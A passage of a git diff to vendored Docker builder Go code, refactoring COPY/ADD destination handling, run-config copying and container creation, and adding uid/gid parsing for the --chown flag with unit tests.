parseChownFlag(inst.chownStr, destInfo.root.Path(), b.idMappings) + if err != nil { + return errors.Wrapf(err, "unable to convert uid/gid chown string to host mapping") } } - // Check to see if we have a default PATH, note that windows won't - // have one as its set by HCS - if system.DefaultPathEnv != "" { - // Convert the slice of strings that represent the current list - // of env vars into a map so we can see if PATH is already set. - // If its not set then go ahead and give it our default value - configEnv := opts.ConvertKVStringsToMap(b.runConfig.Env) - if _, ok := configEnv["PATH"]; !ok { - b.runConfig.Env = append(b.runConfig.Env, - "PATH="+system.DefaultPathEnv) + for _, info := range inst.infos { + opts := copyFileOptions{ + decompress: inst.allowLocalDecompression, + archiver: b.getArchiver(info.root, destInfo.root), + chownPair: chownPair, + } + if err := performCopyForInfo(destInfo, info, opts); err != nil { + return errors.Wrapf(err, "failed to copy files") } } + return b.exportImage(state, rwLayer, imageMount.Image(), runConfigWithCommentCmd) +} - if img == nil { - // Typically this means they used "FROM scratch" - return nil +func createDestInfo(workingDir string, inst copyInstruction, rwLayer builder.RWLayer, platform string) (copyInfo, error) { + // Twiddle the destination when it's a relative path - meaning, make it + // relative to the WORKINGDIR + dest, err := normalizeDest(workingDir, inst.dest, platform) + if err != nil { + return copyInfo{}, errors.Wrapf(err, "invalid %s", inst.cmdName) } - // Process ONBUILD triggers if they exist - if nTriggers := len(b.runConfig.OnBuild); nTriggers != 0 { - word := "trigger" - if nTriggers > 1 { - word = "triggers" + return copyInfo{root: rwLayer.Root(), path: dest}, nil +} + +// normalizeDest normalises the destination of a COPY/ADD command in a +// platform semantically consistent way. 
+func normalizeDest(workingDir, requested string, platform string) (string, error) { + dest := fromSlash(requested, platform) + endsInSlash := strings.HasSuffix(dest, string(separator(platform))) + + if platform != "windows" { + if !path.IsAbs(requested) { + dest = path.Join("/", filepath.ToSlash(workingDir), dest) + // Make sure we preserve any trailing slash + if endsInSlash { + dest += "/" + } + } + return dest, nil + } + + // We are guaranteed that the working directory is already consistent, + // However, Windows also has, for now, the limitation that ADD/COPY can + // only be done to the system drive, not any drives that might be present + // as a result of a bind mount. + // + // So... if the path requested is Linux-style absolute (/foo or \\foo), + // we assume it is the system drive. If it is a Windows-style absolute + // (DRIVE:\\foo), error if DRIVE is not C. And finally, ensure we + // strip any configured working directories drive letter so that it + // can be subsequently legitimately converted to a Windows volume-style + // pathname. + + // Not a typo - filepath.IsAbs, not system.IsAbs on this next check as + // we only want to validate where the DriveColon part has been supplied. + if filepath.IsAbs(dest) { + if strings.ToUpper(string(dest[0])) != "C" { + return "", fmt.Errorf("Windows does not support destinations not on the system drive (C:)") } - fmt.Fprintf(b.Stderr, "# Executing %d build %s...\n", nTriggers, word) + dest = dest[2:] // Strip the drive letter } - // Copy the ONBUILD triggers, and remove them from the config, since the config will be committed. - onBuildTriggers := b.runConfig.OnBuild - b.runConfig.OnBuild = []string{} - - // parse the ONBUILD triggers by invoking the parser - for _, step := range onBuildTriggers { - ast, err := parser.Parse(strings.NewReader(step), &b.directive) - if err != nil { - return err + // Cannot handle relative where WorkingDir is not the system drive. 
+ if len(workingDir) > 0 { + if ((len(workingDir) > 1) && !system.IsAbs(workingDir[2:])) || (len(workingDir) == 1) { + return "", fmt.Errorf("Current WorkingDir %s is not platform consistent", workingDir) } - - total := len(ast.Children) - for _, n := range ast.Children { - if err := b.checkDispatch(n, true); err != nil { - return err + if !system.IsAbs(dest) { + if string(workingDir[0]) != "C" { + return "", fmt.Errorf("Windows does not support relative paths when WORKDIR is not the system drive") } - } - for i, n := range ast.Children { - if err := b.dispatch(i, total, n); err != nil { - return err + dest = filepath.Join(string(os.PathSeparator), workingDir[2:], dest) + // Make sure we preserve any trailing slash + if endsInSlash { + dest += string(os.PathSeparator) } } } - - return nil + return dest, nil } -// probeCache checks if cache match can be found for current build instruction. -// If an image is found, probeCache returns `(true, nil)`. -// If no image is found, it returns `(false, nil)`. -// If there is any error, it returns `(false, err)`. 
-func (b *Builder) probeCache() (bool, error) { - c := b.imageCache - if c == nil || b.options.NoCache || b.cacheBusted { - return false, nil - } - cache, err := c.GetCache(b.image, b.runConfig) - if err != nil { - return false, err +// For backwards compat, if there's just one info then use it as the +// cache look-up string, otherwise hash 'em all into one +func getSourceHashFromInfos(infos []copyInfo) string { + if len(infos) == 1 { + return infos[0].hash } - if len(cache) == 0 { - logrus.Debugf("[BUILDER] Cache miss: %s", b.runConfig.Cmd) - b.cacheBusted = true - return false, nil + var hashs []string + for _, info := range infos { + hashs = append(hashs, info.hash) } + return hashStringSlice("multi", hashs) +} - fmt.Fprintf(b.Stdout, " ---> Using cache\n") - logrus.Debugf("[BUILDER] Use cached version: %s", b.runConfig.Cmd) - b.image = string(cache) - - return true, nil +func hashStringSlice(prefix string, slice []string) string { + hasher := sha256.New() + hasher.Write([]byte(strings.Join(slice, ","))) + return prefix + ":" + hex.EncodeToString(hasher.Sum(nil)) } -func (b *Builder) create() (string, error) { - if b.image == "" && !b.noBaseImage { - return "", fmt.Errorf("Please provide a source image with `from` prior to run") - } - b.runConfig.Image = b.image +type runConfigModifier func(*container.Config) - resources := container.Resources{ - CgroupParent: b.options.CgroupParent, - CPUShares: b.options.CPUShares, - CPUPeriod: b.options.CPUPeriod, - CPUQuota: b.options.CPUQuota, - CpusetCpus: b.options.CPUSetCPUs, - CpusetMems: b.options.CPUSetMems, - Memory: b.options.Memory, - MemorySwap: b.options.MemorySwap, - Ulimits: b.options.Ulimits, - } - - // TODO: why not embed a hostconfig in builder? 
- hostConfig := &container.HostConfig{ - SecurityOpt: b.options.SecurityOpt, - Isolation: b.options.Isolation, - ShmSize: b.options.ShmSize, - Resources: resources, - NetworkMode: container.NetworkMode(b.options.NetworkMode), +func withCmd(cmd []string) runConfigModifier { + return func(runConfig *container.Config) { + runConfig.Cmd = cmd } +} - config := *b.runConfig - - // Create the container - c, err := b.docker.ContainerCreate(types.ContainerCreateConfig{ - Config: b.runConfig, - HostConfig: hostConfig, - }) - if err != nil { - return "", err +// withCmdComment sets Cmd to a nop comment string. See withCmdCommentString for +// why there are two almost identical versions of this. +func withCmdComment(comment string, platform string) runConfigModifier { + return func(runConfig *container.Config) { + runConfig.Cmd = append(getShell(runConfig, platform), "#(nop) ", comment) } - for _, warning := range c.Warnings { - fmt.Fprintf(b.Stdout, " ---> [Warning] %s\n", warning) - } - - b.tmpContainers[c.ID] = struct{}{} - fmt.Fprintf(b.Stdout, " ---> Running in %s\n", stringid.TruncateID(c.ID)) +} - // override the entry point that may have been picked up from the base image - if err := b.docker.ContainerUpdateCmdOnBuild(c.ID, config.Cmd); err != nil { - return "", err +// withCmdCommentString exists to maintain compatibility with older versions. +// A few instructions (workdir, copy, add) used a nop comment that is a single arg +// where as all the other instructions used a two arg comment string. This +// function implements the single arg version. 
+func withCmdCommentString(comment string, platform string) runConfigModifier { + return func(runConfig *container.Config) { + runConfig.Cmd = append(getShell(runConfig, platform), "#(nop) "+comment) } +} - return c.ID, nil +func withEnv(env []string) runConfigModifier { + return func(runConfig *container.Config) { + runConfig.Env = env + } } -var errCancelled = errors.New("build cancelled") - -func (b *Builder) run(cID string) (err error) { - errCh := make(chan error) - go func() { - errCh <- b.docker.ContainerAttachRaw(cID, nil, b.Stdout, b.Stderr, true) - }() - - finished := make(chan struct{}) - cancelErrCh := make(chan error, 1) - go func() { - select { - case <-b.clientCtx.Done(): - logrus.Debugln("Build cancelled, killing and removing container:", cID) - b.docker.ContainerKill(cID, 0) - b.removeContainer(cID) - cancelErrCh <- errCancelled - case <-finished: - cancelErrCh <- nil +// withEntrypointOverride sets an entrypoint on runConfig if the command is +// not empty. The entrypoint is left unmodified if command is empty. +// +// The dockerfile RUN instruction expect to run without an entrypoint +// so the runConfig entrypoint needs to be modified accordingly. ContainerCreate +// will change a []string{""} entrypoint to nil, so we probe the cache with the +// nil entrypoint. 
+func withEntrypointOverride(cmd []string, entrypoint []string) runConfigModifier { + return func(runConfig *container.Config) { + if len(cmd) > 0 { + runConfig.Entrypoint = entrypoint } - }() + } +} - if err := b.docker.ContainerStart(cID, nil, "", ""); err != nil { - close(finished) - if cancelErr := <-cancelErrCh; cancelErr != nil { - logrus.Debugf("Build cancelled (%v) and got an error from ContainerStart: %v", - cancelErr, err) +func copyRunConfig(runConfig *container.Config, modifiers ...runConfigModifier) *container.Config { + copy := *runConfig + copy.Cmd = copyStringSlice(runConfig.Cmd) + copy.Env = copyStringSlice(runConfig.Env) + copy.Entrypoint = copyStringSlice(runConfig.Entrypoint) + copy.OnBuild = copyStringSlice(runConfig.OnBuild) + copy.Shell = copyStringSlice(runConfig.Shell) + + if copy.Volumes != nil { + copy.Volumes = make(map[string]struct{}, len(runConfig.Volumes)) + for k, v := range runConfig.Volumes { + copy.Volumes[k] = v } - return err } - // Block on reading output from container, stop on err or chan closed - if err := <-errCh; err != nil { - close(finished) - if cancelErr := <-cancelErrCh; cancelErr != nil { - logrus.Debugf("Build cancelled (%v) and got an error from errCh: %v", - cancelErr, err) + if copy.ExposedPorts != nil { + copy.ExposedPorts = make(nat.PortSet, len(runConfig.ExposedPorts)) + for k, v := range runConfig.ExposedPorts { + copy.ExposedPorts[k] = v } - return err } - if ret, _ := b.docker.ContainerWait(cID, -1); ret != 0 { - close(finished) - if cancelErr := <-cancelErrCh; cancelErr != nil { - logrus.Debugf("Build cancelled (%v) and got a non-zero code from ContainerWait: %d", - cancelErr, ret) - } - // TODO: change error type, because jsonmessage.JSONError assumes HTTP - return &jsonmessage.JSONError{ - Message: fmt.Sprintf("The command '%s' returned a non-zero code: %d", strings.Join(b.runConfig.Cmd, " "), ret), - Code: ret, + if copy.Labels != nil { + copy.Labels = make(map[string]string, len(runConfig.Labels)) + 
for k, v := range runConfig.Labels { + copy.Labels[k] = v } } - close(finished) - return <-cancelErrCh -} -func (b *Builder) removeContainer(c string) error { - rmConfig := &types.ContainerRmConfig{ - ForceRemove: true, - RemoveVolume: true, + for _, modifier := range modifiers { + modifier(©) } - if err := b.docker.ContainerRm(c, rmConfig); err != nil { - fmt.Fprintf(b.Stdout, "Error removing intermediate container %s: %v\n", stringid.TruncateID(c), err) - return err + return © +} + +func copyStringSlice(orig []string) []string { + if orig == nil { + return nil } - return nil + return append([]string{}, orig...) } -func (b *Builder) clearTmp() { - for c := range b.tmpContainers { - if err := b.removeContainer(c); err != nil { - return - } - delete(b.tmpContainers, c) - fmt.Fprintf(b.Stdout, "Removing intermediate container %s\n", stringid.TruncateID(c)) +// getShell is a helper function which gets the right shell for prefixing the +// shell-form of RUN, ENTRYPOINT and CMD instructions +func getShell(c *container.Config, os string) []string { + if 0 == len(c.Shell) { + return append([]string{}, defaultShellForOS(os)[:]...) } + return append([]string{}, c.Shell[:]...) } -// readDockerfile reads a Dockerfile from the current context. -func (b *Builder) readDockerfile() error { - // If no -f was specified then look for 'Dockerfile'. If we can't find - // that then look for 'dockerfile'. If neither are found then default - // back to 'Dockerfile' and use that in the error message. 
- if b.options.Dockerfile == "" { - b.options.Dockerfile = builder.DefaultDockerfileName - if _, _, err := b.context.Stat(b.options.Dockerfile); os.IsNotExist(err) { - lowercase := strings.ToLower(b.options.Dockerfile) - if _, _, err := b.context.Stat(lowercase); err == nil { - b.options.Dockerfile = lowercase - } - } +func (b *Builder) probeCache(dispatchState *dispatchState, runConfig *container.Config) (bool, error) { + cachedID, err := b.imageProber.Probe(dispatchState.imageID, runConfig) + if cachedID == "" || err != nil { + return false, err } + fmt.Fprint(b.Stdout, " ---> Using cache\n") - err := b.parseDockerfile() + dispatchState.imageID = cachedID + return true, nil +} - if err != nil { - return err - } +var defaultLogConfig = container.LogConfig{Type: "none"} - // After the Dockerfile has been parsed, we need to check the .dockerignore - // file for either "Dockerfile" or ".dockerignore", and if either are - // present then erase them from the build context. These files should never - // have been sent from the client but we did send them to make sure that - // we had the Dockerfile to actually parse, and then we also need the - // .dockerignore file to know whether either file should be removed. - // Note that this assumes the Dockerfile has been read into memory and - // is now safe to be removed. 
- if dockerIgnore, ok := b.context.(builder.DockerIgnoreContext); ok { - dockerIgnore.Process([]string{b.options.Dockerfile}) +func (b *Builder) probeAndCreate(dispatchState *dispatchState, runConfig *container.Config) (string, error) { + if hit, err := b.probeCache(dispatchState, runConfig); err != nil || hit { + return "", err } - return nil + return b.create(runConfig) } -func (b *Builder) parseDockerfile() error { - f, err := b.context.Open(b.options.Dockerfile) +func (b *Builder) create(runConfig *container.Config) (string, error) { + logrus.Debugf("[BUILDER] Command to be executed: %v", runConfig.Cmd) + hostConfig := hostConfigFromOptions(b.options) + container, err := b.containerManager.Create(runConfig, hostConfig) if err != nil { - if os.IsNotExist(err) { - return fmt.Errorf("Cannot locate specified Dockerfile: %s", b.options.Dockerfile) - } - return err + return "", err } - defer f.Close() - if f, ok := f.(*os.File); ok { - // ignoring error because Open already succeeded - fi, err := f.Stat() - if err != nil { - return fmt.Errorf("Unexpected error reading Dockerfile: %v", err) - } - if fi.Size() == 0 { - return fmt.Errorf("The Dockerfile (%s) cannot be empty", b.options.Dockerfile) - } + // TODO: could this be moved into containerManager.Create() ? 
+ for _, warning := range container.Warnings { + fmt.Fprintf(b.Stdout, " ---> [Warning] %s\n", warning) } - b.dockerfile, err = parser.Parse(f, &b.directive) - if err != nil { - return err + fmt.Fprintf(b.Stdout, " ---> Running in %s\n", stringid.TruncateID(container.ID)) + return container.ID, nil +} + +func hostConfigFromOptions(options *types.ImageBuildOptions) *container.HostConfig { + resources := container.Resources{ + CgroupParent: options.CgroupParent, + CPUShares: options.CPUShares, + CPUPeriod: options.CPUPeriod, + CPUQuota: options.CPUQuota, + CpusetCpus: options.CPUSetCPUs, + CpusetMems: options.CPUSetMems, + Memory: options.Memory, + MemorySwap: options.MemorySwap, + Ulimits: options.Ulimits, + } + + hc := &container.HostConfig{ + SecurityOpt: options.SecurityOpt, + Isolation: options.Isolation, + ShmSize: options.ShmSize, + Resources: resources, + NetworkMode: container.NetworkMode(options.NetworkMode), + // Set a log config to override any default value set on the daemon + LogConfig: defaultLogConfig, + ExtraHosts: options.ExtraHosts, } - return nil + // For WCOW, the default of 20GB hard-coded in the platform + // is too small for builder scenarios where many users are + // using RUN statements to install large amounts of data. + // Use 127GB as that's the default size of a VHD in Hyper-V. + if runtime.GOOS == "windows" && options.Platform == "windows" { + hc.StorageOpt = make(map[string]string) + hc.StorageOpt["size"] = "127GB" + } + + return hc } -// determine if build arg is part of built-in args or user -// defined args in Dockerfile at any point in time. 
-func (b *Builder) isBuildArgAllowed(arg string) bool { - if _, ok := BuiltinAllowedBuildArgs[arg]; ok { - return true +// fromSlash works like filepath.FromSlash but with a given OS platform field +func fromSlash(path, platform string) string { + if platform == "windows" { + return strings.Replace(path, "/", "\\", -1) } - if _, ok := b.allowedBuildArgs[arg]; ok { - return true + return path +} + +// separator returns a OS path separator for the given OS platform +func separator(platform string) byte { + if platform == "windows" { + return '\\' } - return false + return '/' } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go new file mode 100644 index 0000000000..1014b16a21 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go @@ -0,0 +1,88 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "path/filepath" + "strconv" + "strings" + + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/symlink" + lcUser "github.com/opencontainers/runc/libcontainer/user" + "github.com/pkg/errors" +) + +func parseChownFlag(chown, ctrRootPath string, idMappings *idtools.IDMappings) (idtools.IDPair, error) { + var userStr, grpStr string + parts := strings.Split(chown, ":") + if len(parts) > 2 { + return idtools.IDPair{}, errors.New("invalid chown string format: " + chown) + } + if len(parts) == 1 { + // if no group specified, use the user spec as group as well + userStr, grpStr = parts[0], parts[0] + } else { + userStr, grpStr = parts[0], parts[1] + } + + passwdPath, err := symlink.FollowSymlinkInScope(filepath.Join(ctrRootPath, "etc", "passwd"), ctrRootPath) + if err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "can't resolve /etc/passwd path in container rootfs") + } + groupPath, err := symlink.FollowSymlinkInScope(filepath.Join(ctrRootPath, "etc", "group"), ctrRootPath) + if 
err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "can't resolve /etc/group path in container rootfs") + } + uid, err := lookupUser(userStr, passwdPath) + if err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "can't find uid for user "+userStr) + } + gid, err := lookupGroup(grpStr, groupPath) + if err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "can't find gid for group "+grpStr) + } + + // convert as necessary because of user namespaces + chownPair, err := idMappings.ToHost(idtools.IDPair{UID: uid, GID: gid}) + if err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "unable to convert uid/gid to host mapping") + } + return chownPair, nil +} + +func lookupUser(userStr, filepath string) (int, error) { + // if the string is actually a uid integer, parse to int and return + // as we don't need to translate with the help of files + uid, err := strconv.Atoi(userStr) + if err == nil { + return uid, nil + } + users, err := lcUser.ParsePasswdFileFilter(filepath, func(u lcUser.User) bool { + return u.Name == userStr + }) + if err != nil { + return 0, err + } + if len(users) == 0 { + return 0, errors.New("no such user: " + userStr) + } + return users[0].Uid, nil +} + +func lookupGroup(groupStr, filepath string) (int, error) { + // if the string is actually a gid integer, parse to int and return + // as we don't need to translate with the help of files + gid, err := strconv.Atoi(groupStr) + if err == nil { + return gid, nil + } + groups, err := lcUser.ParseGroupFileFilter(filepath, func(g lcUser.Group) bool { + return g.Name == groupStr + }) + if err != nil { + return 0, err + } + if len(groups) == 0 { + return 0, errors.New("no such group: " + groupStr) + } + return groups[0].Gid, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go new file mode 100644 index 0000000000..1b3a99893a --- /dev/null +++ 
b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go @@ -0,0 +1,138 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/pkg/idtools" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestChownFlagParsing(t *testing.T) { + testFiles := map[string]string{ + "passwd": `root:x:0:0::/bin:/bin/false +bin:x:1:1::/bin:/bin/false +wwwwww:x:21:33::/bin:/bin/false +unicorn:x:1001:1002::/bin:/bin/false + `, + "group": `root:x:0: +bin:x:1: +wwwwww:x:33: +unicorn:x:1002: +somegrp:x:5555: +othergrp:x:6666: + `, + } + // test mappings for validating use of maps + idMaps := []idtools.IDMap{ + { + ContainerID: 0, + HostID: 100000, + Size: 65536, + }, + } + remapped := idtools.NewIDMappingsFromMaps(idMaps, idMaps) + unmapped := &idtools.IDMappings{} + + contextDir, cleanup := createTestTempDir(t, "", "builder-chown-parse-test") + defer cleanup() + + if err := os.Mkdir(filepath.Join(contextDir, "etc"), 0755); err != nil { + t.Fatalf("error creating test directory: %v", err) + } + + for filename, content := range testFiles { + createTestTempFile(t, filepath.Join(contextDir, "etc"), filename, content, 0644) + } + + // positive tests + for _, testcase := range []struct { + name string + chownStr string + idMapping *idtools.IDMappings + expected idtools.IDPair + }{ + { + name: "UIDNoMap", + chownStr: "1", + idMapping: unmapped, + expected: idtools.IDPair{UID: 1, GID: 1}, + }, + { + name: "UIDGIDNoMap", + chownStr: "0:1", + idMapping: unmapped, + expected: idtools.IDPair{UID: 0, GID: 1}, + }, + { + name: "UIDWithMap", + chownStr: "0", + idMapping: remapped, + expected: idtools.IDPair{UID: 100000, GID: 100000}, + }, + { + name: "UIDGIDWithMap", + chownStr: "1:33", + idMapping: remapped, + expected: idtools.IDPair{UID: 100001, GID: 100033}, + }, + { + name: "UserNoMap", + chownStr: "bin:5555", + idMapping: unmapped, + expected: idtools.IDPair{UID: 
1, GID: 5555}, + }, + { + name: "GroupWithMap", + chownStr: "0:unicorn", + idMapping: remapped, + expected: idtools.IDPair{UID: 100000, GID: 101002}, + }, + { + name: "UserOnlyWithMap", + chownStr: "unicorn", + idMapping: remapped, + expected: idtools.IDPair{UID: 101001, GID: 101002}, + }, + } { + t.Run(testcase.name, func(t *testing.T) { + idPair, err := parseChownFlag(testcase.chownStr, contextDir, testcase.idMapping) + assert.NilError(t, err, "Failed to parse chown flag: %q", testcase.chownStr) + assert.Check(t, is.DeepEqual(testcase.expected, idPair), "chown flag mapping failure") + }) + } + + // error tests + for _, testcase := range []struct { + name string + chownStr string + idMapping *idtools.IDMappings + descr string + }{ + { + name: "BadChownFlagFormat", + chownStr: "bob:1:555", + idMapping: unmapped, + descr: "invalid chown string format: bob:1:555", + }, + { + name: "UserNoExist", + chownStr: "bob", + idMapping: unmapped, + descr: "can't find uid for user bob: no such user: bob", + }, + { + name: "GroupNoExist", + chownStr: "root:bob", + idMapping: unmapped, + descr: "can't find gid for group bob: no such group: bob", + }, + } { + t.Run(testcase.name, func(t *testing.T) { + _, err := parseChownFlag(testcase.chownStr, contextDir, testcase.idMapping) + assert.Check(t, is.Error(err, testcase.descr), "Expected error string doesn't match") + }) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go index d170d8e25a..1c34fd3871 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go @@ -1,13 +1,21 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( "fmt" - "strings" + "os" + "runtime" "testing" "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + 
"github.com/docker/docker/api/types/container" "github.com/docker/docker/builder" + "github.com/docker/docker/builder/remotecontext" "github.com/docker/docker/pkg/archive" + "github.com/docker/go-connections/nat" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) func TestEmptyDockerfile(t *testing.T) { @@ -16,7 +24,7 @@ func TestEmptyDockerfile(t *testing.T) { createTestTempFile(t, contextDir, builder.DefaultDockerfileName, "", 0777) - readAndCheckDockerfile(t, "emptyDockefile", contextDir, "", "The Dockerfile (Dockerfile) cannot be empty") + readAndCheckDockerfile(t, "emptyDockerfile", contextDir, "", "the Dockerfile (Dockerfile) cannot be empty") } func TestSymlinkDockerfile(t *testing.T) { @@ -38,7 +46,7 @@ func TestDockerfileOutsideTheBuildContext(t *testing.T) { contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") defer cleanup() - expectedError := "Forbidden path outside the build context" + expectedError := "Forbidden path outside the build context: ../../Dockerfile ()" readAndCheckDockerfile(t, "DockerfileOutsideTheBuildContext", contextDir, "../../Dockerfile", expectedError) } @@ -53,11 +61,9 @@ func TestNonExistingDockerfile(t *testing.T) { } func readAndCheckDockerfile(t *testing.T, testName, contextDir, dockerfilePath, expectedError string) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tarStream, err := archive.Tar(contextDir, archive.Uncompressed) - - if err != nil { - t.Fatalf("Error when creating tar stream: %s", err) - } + assert.NilError(t, err) defer func() { if err = tarStream.Close(); err != nil { @@ -65,31 +71,103 @@ func readAndCheckDockerfile(t *testing.T, testName, contextDir, dockerfilePath, } }() - context, err := builder.MakeTarSumContext(tarStream) - - if err != nil { - t.Fatalf("Error when creating tar context: %s", err) + if dockerfilePath == "" { // handled in BuildWithContext + dockerfilePath = builder.DefaultDockerfileName } - defer func() { - if err = 
context.Close(); err != nil { - t.Fatalf("Error when closing tar context: %s", err) - } - }() + config := backend.BuildConfig{ + Options: &types.ImageBuildOptions{Dockerfile: dockerfilePath}, + Source: tarStream, + } + _, _, err = remotecontext.Detect(config) + assert.Check(t, is.Error(err, expectedError)) +} - options := &types.ImageBuildOptions{ - Dockerfile: dockerfilePath, +func TestCopyRunConfig(t *testing.T) { + defaultEnv := []string{"foo=1"} + defaultCmd := []string{"old"} + + var testcases = []struct { + doc string + modifiers []runConfigModifier + expected *container.Config + }{ + { + doc: "Set the command", + modifiers: []runConfigModifier{withCmd([]string{"new"})}, + expected: &container.Config{ + Cmd: []string{"new"}, + Env: defaultEnv, + }, + }, + { + doc: "Set the command to a comment", + modifiers: []runConfigModifier{withCmdComment("comment", runtime.GOOS)}, + expected: &container.Config{ + Cmd: append(defaultShellForOS(runtime.GOOS), "#(nop) ", "comment"), + Env: defaultEnv, + }, + }, + { + doc: "Set the command and env", + modifiers: []runConfigModifier{ + withCmd([]string{"new"}), + withEnv([]string{"one", "two"}), + }, + expected: &container.Config{ + Cmd: []string{"new"}, + Env: []string{"one", "two"}, + }, + }, } - b := &Builder{options: options, context: context} + for _, testcase := range testcases { + runConfig := &container.Config{ + Cmd: defaultCmd, + Env: defaultEnv, + } + runConfigCopy := copyRunConfig(runConfig, testcase.modifiers...) 
+ assert.Check(t, is.DeepEqual(testcase.expected, runConfigCopy), testcase.doc) + // Assert the original was not modified + assert.Check(t, runConfig != runConfigCopy, testcase.doc) + } - err = b.readDockerfile() +} - if err == nil { - t.Fatalf("No error when executing test: %s", testName) +func fullMutableRunConfig() *container.Config { + return &container.Config{ + Cmd: []string{"command", "arg1"}, + Env: []string{"env1=foo", "env2=bar"}, + ExposedPorts: nat.PortSet{ + "1000/tcp": {}, + "1001/tcp": {}, + }, + Volumes: map[string]struct{}{ + "one": {}, + "two": {}, + }, + Entrypoint: []string{"entry", "arg1"}, + OnBuild: []string{"first", "next"}, + Labels: map[string]string{ + "label1": "value1", + "label2": "value2", + }, + Shell: []string{"shell", "-c"}, } +} - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", expectedError, err.Error()) - } +func TestDeepCopyRunConfig(t *testing.T) { + runConfig := fullMutableRunConfig() + copy := copyRunConfig(runConfig) + assert.Check(t, is.DeepEqual(fullMutableRunConfig(), copy)) + + copy.Cmd[1] = "arg2" + copy.Env[1] = "env2=new" + copy.ExposedPorts["10002"] = struct{}{} + copy.Volumes["three"] = struct{}{} + copy.Entrypoint[1] = "arg2" + copy.OnBuild[0] = "start" + copy.Labels["label3"] = "value3" + copy.Shell[0] = "sh" + assert.Check(t, is.DeepEqual(fullMutableRunConfig(), runConfig)) } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go deleted file mode 100644 index a8a47c3582..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go +++ /dev/null @@ -1,38 +0,0 @@ -// +build !windows - -package dockerfile - -import ( - "os" - "path/filepath" - "strings" - - "github.com/docker/docker/pkg/system" -) - -// normaliseDest normalises the destination of a COPY/ADD command in a -// platform semantically consistent way. 
-func normaliseDest(cmdName, workingDir, requested string) (string, error) { - dest := filepath.FromSlash(requested) - endsInSlash := strings.HasSuffix(requested, string(os.PathSeparator)) - if !system.IsAbs(requested) { - dest = filepath.Join(string(os.PathSeparator), filepath.FromSlash(workingDir), dest) - // Make sure we preserve any trailing slash - if endsInSlash { - dest += string(os.PathSeparator) - } - } - return dest, nil -} - -func containsWildcards(name string) bool { - for i := 0; i < len(name); i++ { - ch := name[i] - if ch == '\\' { - i++ - } else if ch == '*' || ch == '?' || ch == '[' { - return true - } - } - return false -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go index f60b112049..26978b48cf 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go @@ -1,66 +1,7 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" -import ( - "fmt" - "os" - "path/filepath" - "strings" +import "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/system" -) - -// normaliseDest normalises the destination of a COPY/ADD command in a -// platform semantically consistent way. -func normaliseDest(cmdName, workingDir, requested string) (string, error) { - dest := filepath.FromSlash(requested) - endsInSlash := strings.HasSuffix(dest, string(os.PathSeparator)) - - // We are guaranteed that the working directory is already consistent, - // However, Windows also has, for now, the limitation that ADD/COPY can - // only be done to the system drive, not any drives that might be present - // as a result of a bind mount. - // - // So... if the path requested is Linux-style absolute (/foo or \\foo), - // we assume it is the system drive. 
If it is a Windows-style absolute - // (DRIVE:\\foo), error if DRIVE is not C. And finally, ensure we - // strip any configured working directories drive letter so that it - // can be subsequently legitimately converted to a Windows volume-style - // pathname. - - // Not a typo - filepath.IsAbs, not system.IsAbs on this next check as - // we only want to validate where the DriveColon part has been supplied. - if filepath.IsAbs(dest) { - if strings.ToUpper(string(dest[0])) != "C" { - return "", fmt.Errorf("Windows does not support %s with a destinations not on the system drive (C:)", cmdName) - } - dest = dest[2:] // Strip the drive letter - } - - // Cannot handle relative where WorkingDir is not the system drive. - if len(workingDir) > 0 { - if ((len(workingDir) > 1) && !system.IsAbs(workingDir[2:])) || (len(workingDir) == 1) { - return "", fmt.Errorf("Current WorkingDir %s is not platform consistent", workingDir) - } - if !system.IsAbs(dest) { - if string(workingDir[0]) != "C" { - return "", fmt.Errorf("Windows does not support %s with relative paths when WORKDIR is not the system drive", cmdName) - } - dest = filepath.Join(string(os.PathSeparator), workingDir[2:], dest) - // Make sure we preserve any trailing slash - if endsInSlash { - dest += string(os.PathSeparator) - } - } - } - return dest, nil -} - -func containsWildcards(name string) bool { - for i := 0; i < len(name); i++ { - ch := name[i] - if ch == '*' || ch == '?' 
